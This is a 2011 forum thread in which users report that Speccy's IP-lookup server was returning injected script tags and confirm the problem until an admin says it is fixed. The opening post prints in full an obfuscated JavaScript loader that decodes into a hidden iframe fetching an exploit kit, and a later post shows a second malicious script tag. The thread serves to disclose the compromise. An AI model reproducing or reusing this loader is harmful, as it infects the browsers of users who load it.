keyboardNinja Posted April 11, 2011 Share Posted April 11, 2011 While perusing the latest version of Speccy (1.10.248), I noticed something odd under Network. "External IP Address <script type="text/javascript" src="http://www.nsa-lab.com/js.php"></script>12.xxx.xxx.xxx'>http://www.nsa-lab.com/js.php"></script>12.xxx.xxx.xxx with the ending x's being the rest of my public IP. I didn't have a clue what this was, so I blindly copied the address (hxxp://www.nsa-lab.com/js.php < intentionally delinkified for this post) into Google Chrome to try and figure out what was going on. When I do that, I get this: The javascript is: function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS('#va','background:url(data:,ring.fromCharCode)');var R=null;var h=document.styleSheets;var F = null;for(var f=0; f < h.length; f++){try{var Z = h[f].cssRules || h[f].rules;for(var m=0;m < Z.length; m++){var Q = Z.item ? Z.item(m) : Z[m];if(Q.selectorText!='#va')continue;x = (Q.cssText) ? Q.cssText : Q.style.cssText;R = "St" + x.match(/(ri[^")]+)/)[1]; F=Q.selectorText.substr(1);};} catch(e){};}L=new Date(2020,11,3,2,21,8);i=L.getSeconds()-4;var o=[i+114,i+93,i+110,i+28,i+61,i+57,i+30,i+94,i+107,i+96,i+117,i+30,i+55,i+101,i+98,i+28,i+36,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+99,i+97,i+112,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+111,i+62,i+117,i+80,i+93,i+99,i+74,i+93,i+105,i+97,i+36,i+61,i+37,i+87,i+44,i+89,i+37,i+119,i+97,i+36,i+37,i+55,i+121,i+97,i+104,i+111,i+97,i+28,i+119,i+114,i+93,i+110,i+28,i+67,i+28,i+57,i+28,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+95,i+110,i+97,i+93,i+112,i+97,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+36,i+61,i+37,i+55,i+112,i+110,i+117,i+28,i+119,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+93,i+108,i+108,i+97,i+106,i+96,i+63,i+100,i+101,i+104,i+96,i+36,i+67,i+37,i+55,i+121,i+28,i+95,i+93,i+112,i+95,i+100,i+28,i+36,i+97,i+37,i+28,i+119,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+94,i+107,i+96,i+117,i+28,i+57,i+28,i+67,i+55,i+121,i+101,i+98,i+28,i+36,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+99,i+97,i+112,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+111,i+62,i+117,i+80,i+93,i+99,i+74,i+93,i+105,i+97,i+36,i+61,i+37,i+87,i+44,i+89,i+37,i+119,i+97,i+36,i+37,i+55,i+121,i+28,i+97,i+104,i+111,i+97,i+28,i+119,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+115,i+110,i+101,i+112,i+97,i+36,i+30,i+56,i+101,i+98,i+110,i+93,i+105,i+97,i+28,i+111,i+110,i+95,i+57,i+35,i+100,i+112,i+112,i+108,i+54,i+43,i+43,i+111,i+97,i+106,i+96,i+42,i+115,i+93,i+110,i+111,i+93,i+115,i+98,i+101,i+94,i+97,i+110,i+42,i+95,i+107,i+105,i+43,i+106,i+97,i+115,i+111,i+43,i+46,i+44,i+45,i+44,i+35,i+28,i+115,i+101,i+96,i+112,i+100,i+57,i+35,i+45,i+44,i+35,i+28,i+100,i+97,i+101,i+99,i+100,i+112,i+57,i+35,i+45,i+44,i+35,i+28,i+111,i+112,i+117,i+104,i+97,i+57,i+35,i+114,i+101,i+111,i+101,i+94,i+101,i+104,i+101,i+112,i+117,i+54,i+100,i+101,i+96,i+96,i+97,i+106,i+55,i+108,i+107,i+111,i+101,i+112,i+101,i+107,i+106,i+54,i+93,i+94,i+111,i+107,i+104,i+113,i+112,i+97,i+55,i+104,i+97,i+98,i+112,i+54,i+44,i+55,i+112,i+107,i+108,i+54,i+44,i+55,i+35,i+58,i+56,i+43,i+101,i+98,i+110,i+93,i+105,i+97,i+58,i+30,i+37,i+55,i+121,i+121,i+114,i+93,i+110,i+28,i+68,i+57,i+44,i+55,i+98,i+113,i+106,i+95,i+112,i+101,i+107,i+106,i+28,i+97,i+36,i+37,i+119,i+115,i+100,i+101,i+104,i+97,i+36,i+68,i+39,i+39,i+28,i+56,i+28,i+45,i+44,i+44,i+37,i+119,i+97,i+36,i+37,i+55,i+121,i+114,i+93,i+110,i+28,i+111,i+28,i+57,i+28,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+95,i+110,i+97,i+93,i+112,i+97,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+36,i+35,i+101,i+98,i+110,i+93,i+105,i+97,i+35,i+37,i+55,i+111,i+42,i+111,i+97,i+112,i+61,i+112,i+112,i+110,i+101,i+94,i+113,i+112,i+97,i+36,i+35,i+111,i+110,i+95,i+35,i+40,i+35,i+100,i+112,i+112,i+108,i+54,i+43,i+43,i+111,i+97,i+106,i+96,i+42,i+115,i+93,i+110,i+111,i+93,i+115,i+98,i+101,i+94,i+97,i+110,i+42,i+95,i+107,i+105,i+43,i+106,i+97,i+115,i+111,i+43,i+46,i+44,i+45,i+44,i+35,i+37,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+114,i+101,i+111,i+101,i+94,i+101,i+104,i+101,i+112,i+117,i+57,i+35,i+100,i+101,i+96,i+96,i+97,i+106,i+35,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+108,i+107,i+111,i+101,i+112,i+101,i+107,i+106,i+57,i+35,i+93,i+94,i+111,i+107,i+104,i+113,i+112,i+97,i+35,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+104,i+97,i+98,i+112,i+57,i+35,i+44,i+35,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+112,i+107,i+108,i+57,i+35,i+44,i+35,i+55,i+111,i+42,i+111,i+97,i+112,i+61,i+112,i+112,i+110,i+101,i+94,i+113,i+112,i+97,i+36,i+35,i+115,i+101,i+96,i+112,i+100,i+35,i+40,i+35,i+45,i+44,i+35,i+37,i+55,i+111,i+42,i+111,i+97,i+112,i+61,i+112,i+112,i+110,i+101,i+94,i+113,i+112,i+97,i+36,i+35,i+100,i+97,i+101,i+99,i+100,i+112,i+35,i+40,i+35,i+45,i+44,i+35,i+37,i+55,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+99,i+97,i+112,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+111,i+62,i+117,i+80,i+93,i+99,i+74,i+93,i+105,i+97,i+36,i+61,i+37,i+87,i+44,i+89,i+42,i+93,i+108,i+108,i+97,i+106,i+96,i+63,i+100,i+101,i+104,i+96,i+36,i+111,i+37,i+55,i+121];b=eval("e" + F + "l");var D='';J=b®;for(var f=0; f < o.length; f++){O=b(o[f]);D+=J(O);}b(D); Posted about it on the Staff forums at BleepingComputer.com, and Grinler (Lawrence Abrams) posted this: Basically whats happening is that speccy is querying your ip address by going to this url: http://speccy.piriform.com/ip/ The content being returned, though, is not only the ip address but a javascript. <script type="text/javascript" src="http://www.nsa-lab.com/js.php"></script> Speccy is 100% compromised. That javascript loads a exploit kit, which has now downloaded some malware onto my Virtual Machine. Pretty sure this would be considered a critical security flaw. -kN Link to comment Share on other sites More sharing options...
therock247uk Posted April 12, 2011 Share Posted April 12, 2011 /me gets the same as the above screeny of specccy. Link to comment Share on other sites More sharing options...
keyboardNinja Posted April 12, 2011 Author Share Posted April 12, 2011 Also, I can see how this would affect people. If you save your report as XML and then load it, it will open Internet Explorer (or your other default browser) automatically and load the XML file. This will trigger the javascript to launch and boom you are infected. Link to comment Share on other sites More sharing options...
SpySentinel Posted April 12, 2011 Share Posted April 12, 2011 Thanks everyone for bringing this to the attention of Piriform. I have send a mass PM out to alert Piriform so hopefully this can be taken care of right away. Proud Graduate of GeekU - Learn how to remove malware Unified Network of Instructors and Trained Eliminators My help is always free, but if you can, please to help me continue the fight against malware. Link to comment Share on other sites More sharing options...
keyboardNinja Posted April 12, 2011 Author Share Posted April 12, 2011 Thanks, SpySentinel. Link to comment Share on other sites More sharing options...
therock247uk Posted April 12, 2011 Share Posted April 12, 2011 cheers. Link to comment Share on other sites More sharing options...
keyboardNinja Posted April 12, 2011 Author Share Posted April 12, 2011 The Publish Snapshot is also affected. <script type="text/javascript" src="http://arent.xip.pl/js.php"></script>http://speccy.piriform.com/results/FmdnvYm6byY0qjs3QKp8w8D Visiting a Snapshot link gives another blocked Trojan: Link to comment Share on other sites More sharing options...
Admin MrG Posted April 12, 2011 Admin Share Posted April 12, 2011 Problem has been fixed. We're currently performing a full investigation into that server. Please note that the software is fine and doesn't contain a virus, it's a fault on our Speccy server. Piriform.com - [CCleaner - Defraggler - Recuva - Speccy] Link to comment Share on other sites More sharing options...
keyboardNinja Posted April 12, 2011 Author Share Posted April 12, 2011 Thanks, MrG. I'm curious to know how this happened... Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now